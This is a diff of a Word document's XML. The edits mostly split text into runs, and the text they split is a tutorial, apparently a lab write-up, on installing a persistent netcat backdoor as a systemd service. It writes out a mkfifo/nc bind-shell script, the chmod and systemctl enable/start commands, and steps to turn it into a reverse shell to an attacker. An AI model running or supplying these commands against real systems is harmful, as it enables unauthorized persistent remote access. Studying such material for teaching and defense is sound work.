-        <w:t>#!/bin/sh</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>#!/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>bin/sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1476,7 +2197,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>rm -f /tmp/f</w:t>
+        <w:t>rm -f /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1486,24 +2221,102 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>mkfifo /tmp/f</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>cat /tmp/f | /bin/sh 2&gt;&amp;1 | nc -l 127.0.0.1 1234 &gt; /tmp/f</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>mkfifo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f | /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2&gt;&amp;1 | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l 127.0.0.1 1234 &gt; /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1574,8 +2387,30 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>sudo chmod +x /etc/systemd/system/backdoor.sh</w:t>
-      </w:r>
+        <w:t xml:space="preserve">sudo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>chmod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> +x </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/etc/systemd/system/backdoor.sh</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1652,7 +2487,21 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">Now, create the systemd service file like the article listed, but replace ExecStart with </w:t>
+        <w:t xml:space="preserve">Now, create the systemd service file like the article listed, but replace </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>ExecStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> with </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1857,12 +2706,30 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>WantedBy=multi-user.target</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>WantedBy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>=multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1992,27 +2859,71 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>sudo systemctl enable /etc/systemd/system/backdoor.service</w:t>
-      </w:r>
+        <w:t>sudo systemctl enable /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/systemd/system/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>backdoor.service</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:br/>
-        <w:t>sudo systemctl start backdoor</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>I also ran ss -nat to check to see if I had a process listening on 127.0.0.1 port 1234.  It worked!</w:t>
+        <w:t xml:space="preserve">sudo systemctl start </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>backdoor</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>I also ran ss -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>nat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to check to see if I had a process listening on 127.0.0.1 port 1234.  It worked!</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2105,7 +3016,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>The service we just created will stop as soon as the remote computer disconnects.  Bummer.  Fix that by using the -k option.  The netcat manual (man nc) describes the -k option this way: “When a connection is completed, listen for another one.”</w:t>
+        <w:t xml:space="preserve">The service we just created will stop as soon as the remote computer disconnects.  Bummer.  Fix that by using the -k option.  The netcat manual (man </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) describes the -k option this way: “When a connection is completed, listen for another one.”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2120,11 +3039,19 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>#!/bin/sh</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>#!/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>bin/sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2138,7 +3065,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>rm -f /tmp/f</w:t>
+        <w:t>rm -f /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2148,24 +3089,88 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>mkfifo /tmp/f</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve">cat /tmp/f | /bin/sh 2&gt;&amp;1 | nc </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>mkfifo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f | /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2&gt;&amp;1 | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2177,7 +3182,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>-l 127.0.0.1 1234 &gt; /tmp/f</w:t>
+        <w:t>-l 127.0.0.1 1234 &gt; /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2220,7 +3239,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Change the backdoor.sh script so that nc connects to our attacker instead of listening for connections.</w:t>
+        <w:t xml:space="preserve">Change the backdoor.sh script so that </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> connects to our attacker instead of listening for connections.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2244,12 +3271,25 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>Start the listener on the attacker machine</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>I’m using the -vv (very verbose) option so ncat will tell me when the victim has connected.</w:t>
+        <w:t xml:space="preserve">Start the listener on the attacker </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>machine</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>I’m using the -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (very verbose) option so ncat will tell me when the victim has connected.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2296,8 +3336,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Change the backdoor.sh script on the victim</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Change the backdoor.sh script on the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>victim</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2343,7 +3388,20 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Remove the -k and -l options from nc, and give it the IP and port of the attacker.</w:t>
+        <w:t xml:space="preserve">Remove the -k and -l options from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> give it the IP and port of the attacker.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2536,7 +3594,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>We have a reverse shell!  It is reverse because the victim connected to us instead of the other way around.</w:t>
+        <w:t xml:space="preserve">We have a reverse shell!  It is </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>reverse</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> because the victim connected to us instead of the other way around.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2566,7 +3632,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="61C87453"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
@@ -2656,7 +3722,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="1">
+  <w:num w:numId="1" w16cid:durableId="1682506059">
     <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>
